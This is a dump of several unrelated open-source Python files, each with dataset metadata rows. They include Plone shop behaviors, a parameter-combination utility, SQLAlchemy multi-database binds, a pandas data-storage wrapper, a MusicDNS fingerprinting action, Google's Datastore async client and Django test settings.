return super(DXGlobalNotificationText, self).global_order_text
@property
def global_overbook_text(self):
if self.context.global_overbook_text:
return self.context.global_overbook_text
return super(DXGlobalNotificationText, self).global_overbook_text
@provider(IFormFieldProvider)
class IBuyablePeriodBehavior(model.Schema):
"""Buyable period behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'buyable_effective',
'buyable_expires'
]
)
buyable_effective = schema.Datetime(
title=_(u'label_buyable_effective_date',
default=u'Buyable effective date'),
required=False
)
buyable_expires = schema.Datetime(
title=_(u'label_buyable_expiration_date',
default=u'Buyable expiration date'),
required=False
)
@implementer(IBuyablePeriod)
@adapter(IBuyablePeriodBehavior)
class DXBuyablePeriod(object):
def __init__(self, context):
self.context = context
@property
def effective(self):
return self.context.buyable_effective
@property
def expires(self):
return self.context.buyable_expires
@provider(IFormFieldProvider)
class ITradingBehavior(model.Schema):
"""Trading behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_number',
'gtin',
]
)
item_number = schema.TextLine(
title=_(u'label_item_number', default=u'Item number'),
description=_(u'help_item_number',
default=u'Buyable Item number'),
required=False)
gtin = schema.TextLine(
title=_(u'label_gtin', default=u'GTIN'),
description=_(u'help_gtin',
default=u'Global Trade Item Number'),
required=False)
@implementer(ITrading)
@adapter(ITradingBehavior)
class DXTrading(object):
def __init__(self, context):
self.context = context
@property
def item_number(self):
return self.context.item_number
@property
def gtin(self):
return self.context.gtin
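# Illustrative usage sketch (hypothetical): the accessor adapters in this
# module are looked up through their interfaces, e.g. for trading data:
#
#     trading = ITrading(context)
#     print(trading.item_number, trading.gtin)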
|
bsd-3-clause
| 5,413,968,990,627,828,000
| 26.651206
| 81
| 0.653784
| false
| 3.932454
| false
| false
| false
|
drix00/pymcxray
|
pymcxray/multipleloop.py
|
1
|
3786
|
#!/usr/bin/env python
"""
This module provides a tool for handling computer experiments with
a set of input parameters, where each input parameter
is varied in a prescribed fashion.
In short, the parameters are held in a dictionary where the keys are
the names of the parameters and the values are the numerical, string
or other values of the parameters. The value can take on multiple
values: e.g., an integer parameter 'a' can have values -1, 1 and
10. Similarly, a string parameter 'method' can have values 'Newton'
and 'Bisection'. The module will generate all combination of all
parameters and values, which in the mentioned example will be
(-1, 'Newton'), (1, 'Newton'), (10, 'Newton'), (-1, 'Bisection'),
(1, 'Bisection'), and (10, 'Bisection'). Particular combination
of values can easily be removed.
The usage and implementation of the module are documented in the
book "Python Scripting for Computational Science" (H. P. Langtangen,
Springer, 2009), Chapter 12.1.
"""
# see also http://pyslice.sourceforge.net/HomePage
def _outer(a, b):
"""
Return the outer product/combination of two lists.
a is a multi- or one-dimensional list,
    b is a one-dimensional list, tuple, NumPy array or scalar
    (a scalar is wrapped in a one-element list)
Return: outer combination 'all_combination'.
The function is to be called repeatedly::
all = _outer(all, p)
"""
all_combination = []
if not isinstance(a, list):
raise TypeError('a must be a list')
if isinstance(b, (float,int,complex,str)): b = [b] # scalar?
if len(a) == 0:
# first call:
for j in b:
all_combination.append([j])
else:
for j in b:
for i in a:
if not isinstance(i, list):
raise TypeError('a must be list of list')
# note: i refers to a list; i.append(j) changes
# the underlying list (in a), which is not what
# we want, we need a copy, extend the copy, and
# add to all_combination
k = i + [j] # extend previous prms with new one
all_combination.append(k)
return all_combination
def combine(prm_values):
"""
Compute the combination of all parameter values in the prm_values
(nested) list. Main function in this module.
param prm_values: nested list ``(parameter_name, list_of_parameter_values)``
or dictionary ``prm_values[parameter_name] = list_of_parameter_values``.
return: (all, names, varied) where
- all contains all combinations (experiments)
all[i] is the list of individual parameter values in
experiment no i
- names contains a list of all parameter names
- varied holds a list of parameter names that are varied
(i.e. where there is more than one value of the parameter,
the rest of the parameters have fixed values)
Code example:
>>> dx = array([1.0/2**k for k in range(2,5)])
>>> dt = 3*dx; dt = dt[:-1]
>>> p = {'dx': dx, 'dt': dt}
>>> p
{'dt': [ 0.75 , 0.375,], 'dx': [ 0.25 , 0.125 , 0.0625,]}
>>> all, names, varied = combine(p)
>>> all
[[0.75, 0.25], [0.375, 0.25], [0.75, 0.125], [0.375, 0.125],
[0.75, 0.0625], [0.375, 0.0625]]
"""
if isinstance(prm_values, dict):
# turn dict into list [(name,values),(name,values),...]:
prm_values = [(name, prm_values[name]) \
for name in prm_values]
all_combination = []
varied = []
for name, values in prm_values:
all_combination = _outer(all_combination, values)
if isinstance(values, list) and len(values) > 1:
varied.append(name)
names = [name for name, values in prm_values]
return all_combination, names, varied
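# Small usage sketch (not part of the original module; parameter names are
# illustrative): prints every experiment produced by combine().
if __name__ == '__main__':
    p = {'w': [0.7, 1.0, 1.3], 'n': [100, 200], 'method': 'Newton'}
    experiments, names, varied = combine(p)
    for experiment in experiments:
        print(', '.join('%s=%s' % (n, v) for n, v in zip(names, experiment)))
    print('varied parameters: %s' % (varied,))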
|
apache-2.0
| -5,109,418,296,811,559,000
| 36.86
| 80
| 0.622557
| false
| 3.59203
| false
| false
| false
|
oas89/iktomi
|
iktomi/db/sqla/__init__.py
|
1
|
1417
|
# -*- coding: utf-8 -*-
import logging
from importlib import import_module
from sqlalchemy import orm, create_engine
from sqlalchemy.orm.query import Query
def multidb_binds(databases, package=None, engine_params=None):
'''Creates dictionary to be passed as `binds` parameter to
`sqlalchemy.orm.sessionmaker()` from dictionary mapping models module name
to connection URI that should be used for these models. Models module must
have `metadata` attribute. `package` when set must be a package or package
name for all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, basestring)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
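# Minimal usage sketch (hypothetical package layout): every submodule of
# ``myproject.models`` is expected to define ``metadata``.
#
#     binds = multidb_binds({'main': 'sqlite://', 'stats': 'sqlite://'},
#                           package='myproject.models')
#     Session = orm.sessionmaker(binds=binds)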
|
mit
| -3,956,359,092,296,895,000
| 41.939394
| 79
| 0.661962
| false
| 4.36
| false
| false
| false
|
vkuznet/rep
|
rep/data/storage.py
|
1
|
5284
|
"""
This is a wrapper for pandas.DataFrame, which allows you to define a dataset for an estimator in a simple way.
"""
from __future__ import division, print_function, absolute_import
import numbers
from numpy.random.mtrand import RandomState
import pandas
import numpy
from sklearn.utils import check_random_state
from ..utils import get_columns_dict, get_columns_in_df
# generating random seeds in the interval [0, RANDINT)
RANDINT = 10000000
class LabeledDataStorage(object):
"""
    This class implements the data interface for estimator training. It contains data, labels and
    weights - all the information needed to train a model.
Parameters:
-----------
:param pandas.DataFrame ds: data
:param target: labels for classification and values for regression (set None for predict methods)
:type target: None or numbers.Number or array-like
:param sample_weight: weight (set None for predict methods)
:type sample_weight: None or numbers.Number or array-like
:param random_state: for pseudo random generator
:type random_state: None or int or RandomState
:param bool shuffle: shuffle or not data
"""
def __init__(self, data, target=None, sample_weight=None, random_state=None, shuffle=False):
self.data = data
self.target = self._get_key(self.data, target)
self.sample_weight = self._get_key(self.data, sample_weight, allow_nones=True)
assert len(self.data) == len(self.target), 'ERROR: Lengths are different for data and target'
if self.sample_weight is not None:
assert len(self.data) == len(self.sample_weight), 'ERROR: Lengths are different for data and sample_weight'
self._random_state = check_random_state(random_state).randint(RANDINT)
self.shuffle = shuffle
self._indices = None
def _get_key(self, ds, key, allow_nones=False):
"""
Get data from ds by key
:param pandas.DataFrame ds: data
:param key: what data get from ds
:type key: None or numbers.Number or array-like
:return: key data
"""
if isinstance(key, str) and ds is not None:
# assert key in set(ds.columns), self._print_err('ERROR:', '%s is absent in data storage' % key)
name = list(get_columns_dict([key]).keys())[0]
return numpy.array(get_columns_in_df(self.data, [key])[name])
elif isinstance(key, numbers.Number):
return numpy.array([key] * len(ds))
else:
if not allow_nones:
return numpy.array(key) if key is not None else numpy.ones(len(ds))
else:
return numpy.array(key) if key is not None else key
def __len__(self):
"""
:return: count of rows in storage
:rtype: int
"""
return len(self.data)
def get_data(self, features=None):
"""
Get data for estimator
:param features: set of feature names (if None then use all features in data storage)
:type features: None or list[str]
:rtype: pandas.DataFrame
"""
df = get_columns_in_df(self.data, features)
        if self.shuffle:
            # DataFrame.irow() was removed from modern pandas; iloc is equivalent
            return df.iloc[self.get_indices()]
return df
def get_targets(self):
"""
Get sample targets for estimator
:rtype: numpy.array
"""
if self.shuffle:
return self.target[self.get_indices()]
return self.target
def get_weights(self, allow_nones=False):
"""
Get sample weights for estimator
:rtype: numpy.array
"""
if self.sample_weight is None:
if allow_nones:
return self.sample_weight
else:
return numpy.ones(len(self.data))
else:
if self.shuffle:
return self.sample_weight[self.get_indices()]
return self.sample_weight
def get_indices(self):
"""
Get data indices
:rtype: numpy.array
"""
if self._indices is None:
rs = RandomState(seed=self._random_state)
self._indices = rs.permutation(len(self))
return self._indices
def col(self, index):
"""
Get necessary columns
        :param index: column name or list of column names to fetch
:type index: None or str or list(str)
:rtype: pandas.Series or pandas.DataFrame
"""
if isinstance(index, str):
name = list(get_columns_dict([index]).keys())[0]
return self.get_data([index])[name]
return self.get_data(index)
def eval_column(self, expression):
"""
Evaluate some expression to get necessary data
:type expression: numbers.Number or array-like or str or function(pandas.DataFrame)
:rtype: numpy.array
"""
if isinstance(expression, numbers.Number):
return numpy.zeros(len(self), dtype=type(expression)) + expression
elif isinstance(expression, str):
return numpy.array(self.col(expression))
elif hasattr(expression, '__call__'):
return numpy.array(expression(self.get_data()))
else:
assert len(expression) == len(self), 'Different length'
return numpy.array(expression)
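# Minimal usage sketch (not part of the original API; column names are
# illustrative): build a tiny labeled storage and read it back shuffled.
if __name__ == '__main__':
    df = pandas.DataFrame({'x': [1.0, 2.0, 3.0], 'y': [0.1, 0.2, 0.3]})
    lds = LabeledDataStorage(df, target=[0, 1, 0], random_state=42,
                             shuffle=True)
    print(len(lds), lds.get_targets(), lds.get_weights())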
|
apache-2.0
| -9,111,050,701,465,696,000
| 32.656051
| 119
| 0.609008
| false
| 4.190325
| false
| false
| false
|
JustinTulloss/harmonize.fm
|
fileprocess/fileprocess/actions/puidgenerator.py
|
1
|
1905
|
import logging
import os
import subprocess
from baseaction import BaseAction
from fileprocess.processingthread import na
from fileprocess.configuration import config
try:
import musicdns
except ImportError:
musicdns = None
import fileprocess
log = logging.getLogger(__name__)
class PuidGenerator(BaseAction):
def __init__(self, *args, **kwargs):
global musicdns
super(PuidGenerator, self).__init__(*args, **kwargs)
if musicdns:
musicdns.initialize()
def can_skip(self, new_file):
if new_file.get('puid'):
return True
else:
return False
def process(self, file):
global musicdns
if not musicdns:
return file
if file.get('puid'):
return file
if not file.has_key('fname'):
return file
if not os.path.exists(file['fname']):
return file
try:
fp = musicdns.create_fingerprint(file['fname'])
puid = musicdns.lookup_fingerprint(fp[0], fp[1], config['musicdns.key'])
except Exception, e:
log.warn("Could not fingerprint %s: %s", file['fname'], e)
            return file  # We don't need the fingerprint per se
log.debug('%s has puid %s', file.get('title'), puid)
if puid != None:
file['puid'] = puid
return file
else:
            # Spin off a process to do the analysis; we don't care whether it
            # succeeds or fails, we're just helping out MusicDNS
try:
gp = subprocess.Popen(
['genpuid', config['musicdns.key'], '-xml',
os.path.abspath(file['fname'])],
stdout=open('/dev/null')
)
except Exception, e:
log.info("Could not generate puid: %s", e)
return file
|
mit
| -1,684,215,555,034,553,600
| 27.863636
| 84
| 0.548556
| false
| 4.087983
| false
| false
| false
|
googleapis/python-datastore
|
google/cloud/datastore_v1/services/datastore/async_client.py
|
1
|
28702
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.datastore_v1.types import datastore
from google.cloud.datastore_v1.types import entity
from google.cloud.datastore_v1.types import query
from .transports.base import DatastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import DatastoreGrpcAsyncIOTransport
from .client import DatastoreClient
class DatastoreAsyncClient:
"""Each RPC normalizes the partition IDs of the keys in its
input entities, and always returns entities with keys with
normalized partition IDs. This applies to all keys and entities,
including those in values, except keys with both an empty path
and an empty or unset partition ID. Normalization of input keys
sets the project ID (if not already set) to the project ID from
the request.
"""
_client: DatastoreClient
DEFAULT_ENDPOINT = DatastoreClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = DatastoreClient.DEFAULT_MTLS_ENDPOINT
common_billing_account_path = staticmethod(
DatastoreClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
DatastoreClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(DatastoreClient.common_folder_path)
parse_common_folder_path = staticmethod(DatastoreClient.parse_common_folder_path)
common_organization_path = staticmethod(DatastoreClient.common_organization_path)
parse_common_organization_path = staticmethod(
DatastoreClient.parse_common_organization_path
)
common_project_path = staticmethod(DatastoreClient.common_project_path)
parse_common_project_path = staticmethod(DatastoreClient.parse_common_project_path)
common_location_path = staticmethod(DatastoreClient.common_location_path)
parse_common_location_path = staticmethod(
DatastoreClient.parse_common_location_path
)
from_service_account_file = DatastoreClient.from_service_account_file
from_service_account_json = from_service_account_file
@property
def transport(self) -> DatastoreTransport:
"""Return the transport used by the client instance.
Returns:
DatastoreTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(DatastoreClient).get_transport_class, type(DatastoreClient)
)
def __init__(
self,
*,
credentials: credentials.Credentials = None,
transport: Union[str, DatastoreTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the datastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.DatastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = DatastoreClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def lookup(
self,
request: datastore.LookupRequest = None,
*,
project_id: str = None,
read_options: datastore.ReadOptions = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.LookupResponse:
r"""Looks up entities by key.
Args:
request (:class:`~.datastore.LookupRequest`):
The request object. The request for
[Datastore.Lookup][google.datastore.v1.Datastore.Lookup].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
read_options (:class:`~.datastore.ReadOptions`):
The options for this lookup request.
This corresponds to the ``read_options`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. Keys of entities to look
up.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.LookupResponse:
The response for
[Datastore.Lookup][google.datastore.v1.Datastore.Lookup].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, read_options, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.LookupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if read_options is not None:
request.read_options = read_options
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.lookup,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def run_query(
self,
request: datastore.RunQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.RunQueryResponse:
r"""Queries for entities.
Args:
request (:class:`~.datastore.RunQueryRequest`):
The request object. The request for
[Datastore.RunQuery][google.datastore.v1.Datastore.RunQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.RunQueryResponse:
The response for
[Datastore.RunQuery][google.datastore.v1.Datastore.RunQuery].
"""
# Create or coerce a protobuf request object.
request = datastore.RunQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.run_query,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def begin_transaction(
self,
request: datastore.BeginTransactionRequest = None,
*,
project_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.BeginTransactionResponse:
r"""Begins a new transaction.
Args:
request (:class:`~.datastore.BeginTransactionRequest`):
The request object. The request for
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.BeginTransactionResponse:
The response for
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.BeginTransactionRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.begin_transaction,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def commit(
self,
request: datastore.CommitRequest = None,
*,
project_id: str = None,
mode: datastore.CommitRequest.Mode = None,
transaction: bytes = None,
mutations: Sequence[datastore.Mutation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.CommitResponse:
r"""Commits a transaction, optionally creating, deleting
or modifying some entities.
Args:
request (:class:`~.datastore.CommitRequest`):
The request object. The request for
[Datastore.Commit][google.datastore.v1.Datastore.Commit].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
mode (:class:`~.datastore.CommitRequest.Mode`):
The type of commit to perform. Defaults to
``TRANSACTIONAL``.
This corresponds to the ``mode`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (:class:`bytes`):
The identifier of the transaction associated with the
commit. A transaction identifier is returned by a call
to
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
mutations (:class:`Sequence[~.datastore.Mutation]`):
The mutations to perform.
When mode is ``TRANSACTIONAL``, mutations affecting a
single entity are applied in order. The following
sequences of mutations affecting a single entity are not
permitted in a single ``Commit`` request:
- ``insert`` followed by ``insert``
- ``update`` followed by ``insert``
- ``upsert`` followed by ``insert``
- ``delete`` followed by ``update``
When mode is ``NON_TRANSACTIONAL``, no two mutations may
affect a single entity.
This corresponds to the ``mutations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.CommitResponse:
The response for
[Datastore.Commit][google.datastore.v1.Datastore.Commit].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, mode, transaction, mutations])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.CommitRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if mode is not None:
request.mode = mode
if transaction is not None:
request.transaction = transaction
if mutations:
request.mutations.extend(mutations)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.commit,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def rollback(
self,
request: datastore.RollbackRequest = None,
*,
project_id: str = None,
transaction: bytes = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.RollbackResponse:
r"""Rolls back a transaction.
Args:
request (:class:`~.datastore.RollbackRequest`):
The request object. The request for
[Datastore.Rollback][google.datastore.v1.Datastore.Rollback].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (:class:`bytes`):
Required. The transaction identifier, returned by a call
to
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.RollbackResponse:
The response for
[Datastore.Rollback][google.datastore.v1.Datastore.Rollback].
(an empty message).
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, transaction])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.RollbackRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if transaction is not None:
request.transaction = transaction
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.rollback,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def allocate_ids(
self,
request: datastore.AllocateIdsRequest = None,
*,
project_id: str = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.AllocateIdsResponse:
r"""Allocates IDs for the given keys, which is useful for
referencing an entity before it is inserted.
Args:
request (:class:`~.datastore.AllocateIdsRequest`):
The request object. The request for
[Datastore.AllocateIds][google.datastore.v1.Datastore.AllocateIds].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. A list of keys with
incomplete key paths for which to
allocate IDs. No key may be
reserved/read-only.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.AllocateIdsResponse:
The response for
[Datastore.AllocateIds][google.datastore.v1.Datastore.AllocateIds].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.AllocateIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.allocate_ids,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def reserve_ids(
self,
request: datastore.ReserveIdsRequest = None,
*,
project_id: str = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.ReserveIdsResponse:
r"""Prevents the supplied keys' IDs from being auto-
llocated by Cloud Datastore.
Args:
request (:class:`~.datastore.ReserveIdsRequest`):
The request object. The request for
[Datastore.ReserveIds][google.datastore.v1.Datastore.ReserveIds].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. A list of keys with
complete key paths whose numeric IDs
should not be auto-allocated.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.ReserveIdsResponse:
The response for
[Datastore.ReserveIds][google.datastore.v1.Datastore.ReserveIds].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.ReserveIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.reserve_ids,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-datastore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DatastoreAsyncClient",)
|
apache-2.0
| 3,394,507,495,499,587,600
| 39.255259
| 93
| 0.602676
| false
| 4.768566
| false
| false
| false
|
takeflight/wagtailtestutils
|
tests/settings.py
|
1
|
2498
|
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
SECRET_KEY = 'not needed'
ROOT_URLCONF = 'wagtail.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = 'static/'
